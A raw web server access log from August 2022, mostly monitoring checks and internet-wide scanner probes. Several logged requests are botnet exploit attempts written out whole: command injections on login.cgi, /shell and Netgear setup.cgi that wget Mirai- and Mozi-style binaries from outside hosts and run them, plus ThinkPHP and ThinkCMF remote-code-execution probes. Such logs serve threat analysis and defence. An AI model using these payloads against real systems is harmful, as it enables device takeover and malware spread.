212.91.246.72 - - [01/Aug/2022:23:32:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2022:23:33:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.138.47 - - [01/Aug/2022:23:33:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.47 - - [01/Aug/2022:23:33:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.47 - - [01/Aug/2022:23:33:22 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
18.132.52.79 - - [01/Aug/2022:23:33:31 +0200] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [01/Aug/2022:23:34:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2022:23:35:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.7.214.104 - - [01/Aug/2022:23:35:30 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
18.132.52.79 - - [01/Aug/2022:23:36:09 +0200] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [01/Aug/2022:23:36:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2022:23:37:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2022:23:38:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.7.214.104 - - [01/Aug/2022:23:38:30 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
18.132.52.79 - - [01/Aug/2022:23:38:48 +0200] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [01/Aug/2022:23:39:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.7.214.104 - - [01/Aug/2022:23:40:14 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [01/Aug/2022:23:40:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
49.142.221.171 - - [01/Aug/2022:23:40:46 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Aug/2022:23:41:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2022:23:42:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
108.27.54.116 - - [01/Aug/2022:23:42:51 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Aug/2022:23:43:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
120.198.75.234 - - [01/Aug/2022:23:44:11 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ http://54.151.27.172/.s4y/arm;sh+/tmp/arm HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [01/Aug/2022:23:44:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.132.52.79 - - [01/Aug/2022:23:45:14 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.132.52.79 - - [01/Aug/2022:23:45:18 +0200] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [01/Aug/2022:23:45:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.132.52.79 - - [01/Aug/2022:23:45:22 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.132.52.79 - - [01/Aug/2022:23:45:26 +0200] "GET /doc/page/login.asp HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.132.52.79 - - [01/Aug/2022:23:45:30 +0200] "GET /users/sign_in HTTP/1.1" 404 318 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.132.52.79 - - [01/Aug/2022:23:45:35 +0200] "GET /webconsole/webpages/login.jsp HTTP/1.1" 404 334 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.132.52.79 - - [01/Aug/2022:23:45:39 +0200] "GET /login/?next=/ HTTP/1.1" 404 311 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.132.52.79 - - [01/Aug/2022:23:45:43 +0200] "GET /global-protect/login.esp HTTP/1.1" 404 329 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.132.52.79 - - [01/Aug/2022:23:45:47 +0200] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 346 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
185.7.214.104 - - [01/Aug/2022:23:45:50 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
18.132.52.79 - - [01/Aug/2022:23:45:51 +0200] "GET /login.rsp HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
111.20.101.88 - - [01/Aug/2022:23:45:54 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
18.132.52.79 - - [01/Aug/2022:23:45:55 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.132.52.79 - - [01/Aug/2022:23:45:59 +0200] "GET /npclient.html HTTP/1.1" 404 318 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.132.52.79 - - [01/Aug/2022:23:46:03 +0200] "GET /apps HTTP/1.1" 404 309 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.132.52.79 - - [01/Aug/2022:23:46:08 +0200] "GET /index.asp HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.132.52.79 - - [01/Aug/2022:23:46:12 +0200] "GET /video.html HTTP/1.1" 404 315 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.132.52.79 - - [01/Aug/2022:23:46:16 +0200] "GET /2.0/gui/ HTTP/1.1" 404 313 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [01/Aug/2022:23:46:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.132.52.79 - - [01/Aug/2022:23:46:20 +0200] "GET /mm/ HTTP/1.1" 404 308 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.132.52.79 - - [01/Aug/2022:23:46:24 +0200] "GET /portal HTTP/1.1" 404 311 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.132.52.79 - - [01/Aug/2022:23:46:28 +0200] "GET /node HTTP/1.1" 404 309 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.132.52.79 - - [01/Aug/2022:23:46:32 +0200] "GET /login.cs HTTP/1.1" 404 313 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.132.52.79 - - [01/Aug/2022:23:46:37 +0200] "GET /login HTTP/1.1" 404 310 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.132.52.79 - - [01/Aug/2022:23:46:41 +0200] "GET /WebViewer.html HTTP/1.1" 404 319 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.132.52.79 - - [01/Aug/2022:23:46:45 +0200] "GET /vpn/index.html HTTP/1.1" 404 319 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.132.52.79 - - [01/Aug/2022:23:46:49 +0200] "GET /web/index.html HTTP/1.1" 404 319 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.132.52.79 - - [01/Aug/2022:23:46:53 +0200] "GET /webui HTTP/1.1" 404 310 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.132.52.79 - - [01/Aug/2022:23:46:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [01/Aug/2022:23:47:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2022:23:48:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.7.214.104 - - [01/Aug/2022:23:48:46 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [01/Aug/2022:23:49:09 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [01/Aug/2022:23:49:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2022:23:50:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2022:23:51:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2022:23:52:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2022:23:53:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.7.214.104 - - [01/Aug/2022:23:54:01 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [01/Aug/2022:23:54:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2022:23:55:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2022:23:56:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2022:23:57:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2022:23:58:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2022:23:59:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.7.214.104 - - [02/Aug/2022:00:00:02 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
20.199.50.247 - - [02/Aug/2022:00:05:32 +0200] "GET /cgi-bin/luci HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20041001 Firefox/0.10.1"
185.7.214.104 - - [02/Aug/2022:00:07:20 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.95.55.5 - - [02/Aug/2022:00:13:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
58.227.158.136 - - [02/Aug/2022:00:17:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:00:17:39 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.95.55.5 - - [02/Aug/2022:00:21:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.118 - - [02/Aug/2022:00:30:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.118 - - [02/Aug/2022:00:30:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.118 - - [02/Aug/2022:00:30:08 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
38.75.137.54 - - [02/Aug/2022:00:36:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
181.90.199.135 - - [02/Aug/2022:00:37:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:00:39:30 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:00:40:53 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:00:42:13 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:00:43:08 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:00:43:57 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
94.73.30.26 - - [02/Aug/2022:00:44:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
94.73.30.26 - - [02/Aug/2022:00:44:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
94.73.30.26 - - [02/Aug/2022:00:44:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
94.73.30.26 - - [02/Aug/2022:00:44:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
94.73.30.26 - - [02/Aug/2022:00:44:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
14.153.238.43 - - [02/Aug/2022:00:47:44 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
38.75.137.54 - - [02/Aug/2022:00:48:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.95.55.5 - - [02/Aug/2022:00:49:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
186.33.67.82 - - [02/Aug/2022:00:49:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
38.75.137.54 - - [02/Aug/2022:00:49:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
38.75.137.54 - - [02/Aug/2022:00:49:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.7.214.104 - - [02/Aug/2022:00:51:01 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:00:53:21 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:00:55:36 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
88.229.159.212 - - [02/Aug/2022:00:59:50 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.7.214.104 - - [02/Aug/2022:01:00:09 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
217.146.82.180 - - [02/Aug/2022:01:01:15 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/4.0 (X11; Linux x86_64 3.0; rv:2.0.1) Gecko/20100101 Firefox/3.4.4"
217.146.82.180 - - [02/Aug/2022:01:01:15 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/3.0 (Windows NT 3.0; rv:2.0.1) Gecko/20100101 Firefox/4.2.3"
217.146.82.180 - - [02/Aug/2022:01:01:15 +0200] "HEAD / HTTP/1.1" 200 - "-" "Opera/4.0 (X11; Linux x86_64 4.1; rv:2.0.1) Gecko/20100101 Firefox/4.2.2"
217.146.82.180 - - [02/Aug/2022:01:01:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (X11; Linux x86_64 3.0; rv:2.0.1) Gecko/20100101 Firefox/3.4.4"
217.146.82.180 - - [02/Aug/2022:01:01:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/3.0 (Windows NT 3.0; rv:2.0.1) Gecko/20100101 Firefox/4.2.3"
217.146.82.180 - - [02/Aug/2022:01:01:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Opera/4.0 (X11; Linux x86_64 4.1; rv:2.0.1) Gecko/20100101 Firefox/4.2.2"
217.146.82.180 - - [02/Aug/2022:01:01:15 +0200] "HEAD / HTTP/1.1" 200 - "-" "IE/4.0 (Windows NT 4.1; rv:2.0.1) Gecko/20100101 Firefox/4.3.2"
217.146.82.180 - - [02/Aug/2022:01:01:15 +0200] "HEAD / HTTP/1.1" 200 - "-" "IE/4.0 (X11; Linux x86_64 3.1; rv:2.0.1) Gecko/20100101 Firefox/4.4.2"
217.146.82.180 - - [02/Aug/2022:01:01:15 +0200] "HEAD / HTTP/1.1" 200 - "-" "Opera/3.0 (X11; Linux x86_64 4.0; rv:2.0.1) Gecko/20100101 Firefox/4.4.0"
217.146.82.180 - - [02/Aug/2022:01:01:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "IE/4.0 (Windows NT 4.1; rv:2.0.1) Gecko/20100101 Firefox/4.3.2"
217.146.82.180 - - [02/Aug/2022:01:01:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "IE/4.0 (X11; Linux x86_64 3.1; rv:2.0.1) Gecko/20100101 Firefox/4.4.2"
217.146.82.180 - - [02/Aug/2022:01:01:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Opera/3.0 (X11; Linux x86_64 4.0; rv:2.0.1) Gecko/20100101 Firefox/4.4.0"
217.146.82.180 - - [02/Aug/2022:01:01:15 +0200] "HEAD / HTTP/1.1" 200 - "-" "Opera/3.0 (X11; Linux x86_64 4.1; rv:2.0.1) Gecko/20100101 Firefox/3.2.1"
217.146.82.180 - - [02/Aug/2022:01:01:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Opera/3.0 (X11; Linux x86_64 4.1; rv:2.0.1) Gecko/20100101 Firefox/3.2.1"
217.146.82.180 - - [02/Aug/2022:01:01:15 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/4.0 (Macintosh 3.0; rv:2.0.1) Gecko/20100101 Firefox/4.3.1"
217.146.82.180 - - [02/Aug/2022:01:01:15 +0200] "HEAD / HTTP/1.1" 200 - "-" "Safari/3.0 (Macintosh 3.0; rv:2.0.1) Gecko/20100101 Firefox/4.1.1"
217.146.82.180 - - [02/Aug/2022:01:01:15 +0200] "HEAD / HTTP/1.1" 200 - "-" "Safari/4.0 (Macintosh 3.0; rv:2.0.1) Gecko/20100101 Firefox/4.4.1"
217.146.82.180 - - [02/Aug/2022:01:01:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (Macintosh 3.0; rv:2.0.1) Gecko/20100101 Firefox/4.3.1"
217.146.82.180 - - [02/Aug/2022:01:01:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Safari/3.0 (Macintosh 3.0; rv:2.0.1) Gecko/20100101 Firefox/4.1.1"
217.146.82.180 - - [02/Aug/2022:01:01:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Safari/4.0 (Macintosh 3.0; rv:2.0.1) Gecko/20100101 Firefox/4.4.1"
185.7.214.104 - - [02/Aug/2022:01:02:50 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:01:03:46 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.95.55.5 - - [02/Aug/2022:01:12:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
82.45.12.15 - - [02/Aug/2022:01:12:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
117.41.212.245 - - [02/Aug/2022:01:14:47 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 128.199.189.244/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
185.7.214.104 - - [02/Aug/2022:01:15:36 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
162.142.125.219 - - [02/Aug/2022:01:20:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.219 - - [02/Aug/2022:01:20:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.219 - - [02/Aug/2022:01:20:06 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
185.7.214.104 - - [02/Aug/2022:01:24:14 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:01:25:05 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [02/Aug/2022:01:25:07 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
42.236.10.84 - - [02/Aug/2022:01:33:58 +0200] "GET / HTTP/1.1" 200 1229 "http://baidu.com/" "Mozilla/5.0 (Linux; U; Android 8.0.0; zh-cn; Mi Note 2 Build/OPR1.170623.032) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/61.0.3163.128 Mobile Safari/537.36 XiaoMi/MiuiBrowser/10.1.1"
198.235.24.32 - - [02/Aug/2022:01:35:22 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.7.214.104 - - [02/Aug/2022:01:36:07 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
